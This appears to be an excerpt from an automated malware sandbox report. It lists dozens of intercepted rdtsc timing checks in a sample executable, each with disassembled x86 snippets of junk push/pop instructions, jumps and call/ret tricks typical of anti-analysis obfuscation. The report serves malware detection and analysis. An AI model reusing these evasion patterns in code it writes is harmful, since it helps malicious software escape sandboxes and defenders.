Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: A5F0C9 second address: A5F0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: A5F0D7 second address: A5F0DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71A4 second address: BD71AE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71AE second address: BD71E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FC9D915F4B6h 0x0000000d popad 0x0000000e push edi 0x0000000f jmp 00007FC9D915F4C4h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b jns 00007FC9D915F4B6h 0x00000021 push esi 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71E2 second address: BD71F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jnl 00007FC9D8BCC166h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71F0 second address: BD7203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007FC9D915F4C2h 0x0000000b je 00007FC9D915F4B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD6349 second address: BD636A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC16Bh 0x0000000d jmp 00007FC9D8BCC16Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD636A second address: BD6370 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD6370 second address: BD6375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD6375 second address: BD637B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD64D8 second address: BD64F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC9D8BCC172h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD64F6 second address: BD651B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C4h 0x00000009 js 00007FC9D915F4B6h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD651B second address: BD6522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD676E second address: BD6778 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD8F63 second address: BD8FBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FC9D8BCC170h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FC9D8BCC168h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b cld 0x0000002c push 00000000h 0x0000002e push 21430882h 0x00000033 jc 00007FC9D8BCC189h 0x00000039 push eax 0x0000003a push edx 0x0000003b js 00007FC9D8BCC166h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD9243 second address: BD9248 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD9248 second address: BD9272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D1EF0h], ebx 0x0000000e push 00000000h 0x00000010 cld 0x00000011 or edx, 14B2F200h 0x00000017 call 00007FC9D8BCC169h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnp 00007FC9D8BCC168h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD9272 second address: BD92DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FC9D915F4B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC9D915F4BEh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FC9D915F4C8h 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e jmp 00007FC9D915F4C4h 0x00000023 push eax 0x00000024 push edx 0x00000025 pop edx 0x00000026 pop eax 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jbe 00007FC9D915F4C3h 0x00000034 jmp 00007FC9D915F4BDh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD92DE second address: BD92E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD939F second address: BD93C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 jnc 00007FC9D915F4B8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC9D915F4BBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD93C2 second address: BD93C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD93C8 second address: BD940F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC9D915F4B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 add edx, dword ptr [ebp+122D2C31h] 0x0000002d lea ebx, dword ptr [ebp+1244DE5Ch] 0x00000033 mov edi, eax 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pushad 0x0000003a popad 0x0000003b pop eax 0x0000003c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BAE second address: BF7BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC9D8BCC166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BB9 second address: BF7BCF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FC9D915F4B6h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BCF second address: BF7BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC9D8BCC166h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BE2 second address: BF7C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FC9D915F4B6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7D85 second address: BF7D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FC9D8BCC166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8051 second address: BF8059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF84BB second address: BF84BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF84BF second address: BF84D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC9D915F4C0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF877F second address: BF8793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC9D8BCC166h 0x0000000a jng 00007FC9D8BCC166h 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8793 second address: BF87B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C9h 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8923 second address: BF8929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8929 second address: BF8947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FC9D915F4C1h 0x0000000a js 00007FC9D915F4BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8947 second address: BF8958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FC9D8BCC166h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8958 second address: BF895E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF895E second address: BF8972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC9D8BCC16Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8AEC second address: BF8B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CA1 second address: BF8CBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FC9D8BCC166h 0x00000009 jmp 00007FC9D8BCC16Ah 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FC9D8BCC166h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CBF second address: BF8CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CC3 second address: BF8CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CD0 second address: BF8CDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CDD second address: BF8CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC9D8BCC166h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD0484 second address: BD048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF9376 second address: BF9387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF97BA second address: BF97D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF9A6B second address: BF9A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C00864 second address: C00869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C00869 second address: C0086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03734 second address: C0376E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D915F4C9h 0x0000000e jc 00007FC9D915F4BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0388F second address: C03893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03893 second address: C038AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC9D915F4C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03A03 second address: C03A09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03B61 second address: C03B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9D915F4BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C04022 second address: C0403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC9D8BCC16Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0403B second address: C04047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007FC9D915F4B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0583C second address: C05849 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05849 second address: C0584D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0584D second address: C05851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05851 second address: C05890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC9D915F4CCh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC9D915F4C4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05890 second address: C0589E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0589E second address: C058B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9D915F4B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jno 00007FC9D915F4B8h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C058B8 second address: C0591C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jno 00007FC9D8BCC168h 0x00000011 jmp 00007FC9D8BCC177h 0x00000016 popad 0x00000017 pop eax 0x00000018 jp 00007FC9D8BCC171h 0x0000001e jnp 00007FC9D8BCC16Bh 0x00000024 push E8B1B19Bh 0x00000029 pushad 0x0000002a jmp 00007FC9D8BCC175h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC9D8BCC16Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05A20 second address: C05A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC9D915F4BEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05DA3 second address: C05DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06574 second address: C065C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC9D915F4B8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jng 00007FC9D915F4B8h 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06705 second address: C0670C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06A86 second address: C06A90 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC9D915F4BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C06A90 second address: C06AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC9D8BCC16Eh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FC9D8BCC168h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push eax 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007FC9D8BCC166h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C07910 second address: C07995 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D915F4CBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FC9D915F4C1h 0x00000010 nop 0x00000011 stc 0x00000012 add dword ptr [ebp+122D2D0Bh], esi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FC9D915F4B8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 pushad 0x00000035 cmc 0x00000036 jnl 00007FC9D915F4B8h 0x0000003c popad 0x0000003d or edi, 4BD78E00h 0x00000043 push 00000000h 0x00000045 jo 00007FC9D915F4BAh 0x0000004b mov si, 4DE9h 0x0000004f push eax 0x00000050 pushad 0x00000051 jl 00007FC9D915F4BCh 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C077CD second address: C077D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C077D1 second address: C077D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C089C4 second address: C089C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C077D7 second address: C077FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FC9D915F4B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C089C8 second address: C089CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C089CE second address: C089DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C091FC second address: C0920E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
